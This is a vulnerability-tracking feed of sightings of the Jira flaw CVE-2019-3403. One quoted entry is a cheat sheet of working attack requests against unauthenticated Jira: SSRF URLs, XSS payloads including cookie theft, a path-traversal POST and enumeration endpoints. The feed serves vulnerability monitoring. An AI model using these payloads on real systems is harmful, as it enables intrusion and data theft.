Most recent sightings.

https://vulnerability.circl.lu/sightings/feed Most recent sightings. 2026-05-28T15:49:20.530083+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/c686003a-ec8b-474c-a2b3-ce412f4ad707/export c686003a-ec8b-474c-a2b3-ce412f4ad707 2026-05-28T15:49:20.880499+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "c686003a-ec8b-474c-a2b3-ce412f4ad707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/cve_mitre_org/139", "content": "CVE-2019-3403 The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check. https://t.co/pe7wdRqJuk\u2014 CVE (@CVEnew) May 22, 2019\n\nMay 22, 2019 at 09:45PM\nvia Twitter https://twitter.com/CVEnew", "creation_timestamp": "2019-05-22T18:48:18.000000Z"} 2019-05-22T18:48:18+00:00 https://vulnerability.circl.lu/sighting/34b8d104-dede-40b2-bd37-04623caf5b1c/export 34b8d104-dede-40b2-bd37-04623caf5b1c 2026-05-28T15:49:20.880396+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "34b8d104-dede-40b2-bd37-04623caf5b1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} 2024-03-18T07:23:33+00:00 https://vulnerability.circl.lu/sighting/7137238e-d276-4c96-9703-593c94c2c588/export 7137238e-d276-4c96-9703-593c94c2c588 2026-05-28T15:49:20.880280+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "7137238e-d276-4c96-9703-593c94c2c588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} 2024-10-09T19:49:41+00:00 https://vulnerability.circl.lu/sighting/5979ded9-b1d2-44cb-a48b-d5959c35ad84/export 5979ded9-b1d2-44cb-a48b-d5959c35ad84 2026-05-28T15:49:20.878505+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "5979ded9-b1d2-44cb-a48b-d5959c35ad84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-3403", "type": "seen", "source": "https://gist.github.com/marcostolosa/bf0f4a6ea030bc83c2d8dde8df077407", "content": "", "creation_timestamp": "2025-04-13T12:04:46.000000Z"} 2025-04-13T12:04:46+00:00